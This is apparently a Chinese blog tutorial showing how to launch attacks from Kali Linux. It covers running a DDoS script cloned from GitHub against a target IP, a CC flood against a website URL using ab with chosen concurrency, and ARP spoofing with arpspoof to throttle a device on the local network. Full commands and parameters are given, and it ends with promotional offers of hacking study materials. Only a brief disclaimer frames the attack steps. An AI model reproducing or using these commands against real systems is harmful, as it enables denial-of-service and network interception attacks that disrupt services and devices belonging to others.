赞
踩
本文章使用的是Kali Linux的2020-4-installer-amd64版本
Kali Linux的安装过程本文章不做过多说明,请自行百度
请正确使用DDos和CC攻击,不要用来做违反当地法律法规的事情,否则后果自负
首先,打开一个命令行
输入以下命令:
git clone https://github.com/Andysun06/ddos
提示如图所示
这样,用于DDos的数据包就已经下载到了你的Kali上
下面,进入你所下载的DDos文件夹,输入命令(注意大小写):
cd ddos
本文用于演示的kali是2020年版本,用python执行ddos-p2.py
,输入命令:
python ddos-p2.py
界面会如下图所示:
然后输入攻击对象的IP(本教程以我的博客为例)
再打开一个命令行窗口:
输入命令:
ping andysun06.gitee.io
即可获得攻击对象的IP地址。(获取IP后Ctrl+C可以结束ping)
然后回到刚刚的命令行窗口,输入ping到的IP地址:
Attack Port即攻击端口,一般服务器默认为80(更多内容请百度)
Attack Speed即攻击速度,数值越大越快,最大不能超过1000
按下回车,如果出现以下界面,即代表已经开始向该IP发起DDos攻击,也就成功了。
首先打开一个命令行窗口
先获得root权限,输入以下命令:
sudo su
然后输入你的账号密码(注意:输入后不会显示出来,不用担心是否输入进去,在输完后按回车,如果输入成功就会获得root权限)
然后输入以下命令:
ab -n 参数1 -c 参数2 网站地址
参数一是并发数(请求的用户量)
参数二是发送总量(请求的总次数)
(有兴趣的可以在百度上另外学习)
参数1,参数2和网站地址由自己设置,这里以 1000,1000,http://bjvcrrn.nat.ipyingshe.com/bbs/ 为例:
出现如上界面即代表已经对目标网址开始了CC攻击,如果出现如下界面,即代表CC攻击完成:
首先,ARP欺骗需要用到dsniff数据包(arpspoof 是 dsniff 的一个附属工具,所以我们需要安装的是 dsniff),安装命令如下:
apt-get install dsniff
当然,有可能会遇到部分数据包安装错误的情况,如果你遇到了这种情况,可以参考这个博文:Kali Linux 2020中使用arpspoof
如果你已经安装了dsniff数据包,就可以开始ARP欺骗了,首先,通过以下命令确定你的网卡名称和IP地址:
ifconfig
然后嗅探你所在WLAN下所有设备的IP地址,命令如下:
fping -g 本机IP地址/24
例如我的IP是192.168.0.101,命令就是fping -g 192.168.0.101/24
我的手机,IP位192.168.0.100就出现在了这里,我们就拿我的手机作为攻击目标,
先获得root权限,输入以下命令:
sudo su
然后输入你的账号密码(注意:输入后不会回显出来,不用担心是否输入进去,在输完后按回车,如果输入成功就会获得root权限)
然后输入以下命令:
arpspoof -i 你的网卡名称 -t 攻击目标的IP地址 攻击目标的网关地址
网卡名称的查看上文已经提过,我以我的网卡为例,名称是eth0
,攻击目标就是我的手机,IP是192.168.0.100
,手机的网关就是192.168.0.1(就是IP的最后一位改为1),于是我的攻击命令就是:
arpspoof -i eth0 -t 192.168.0.100 192.168.0.1
按下回车,如果出现下图回显,就说明正在攻击
现在,我的手机虽然可以上网,但是速度慢的出奇,几分钟都打不开一个网页图片,这就说明我们的ARP欺骗成功了。
如果你想停止攻击,就按下Ctrl+Z
,攻击就停止了。
今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。
给大家分享我自己学习的一份全套的网络安全学习资料,希望对想学习 网络安全的小伙伴们有帮助!
零基础入门
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
【点击免费领取】CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》
攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去接私活完全没有问题。
网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。【点击领取视频教程】
技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本【点击领取技术文档】
(都打包成一块的了,不能一一展开,总共300多集)
技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本【点击领取书籍】
“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。
最后就是我这几年整理的网安方面的面试题,如果你是要找网安方面的工作,它们绝对能帮你大忙。
这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。
参考解析:深信服官网、奇安信官网、Freebuf、csdn等
内容特点:条理清晰,含图像化表示更加易懂。
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。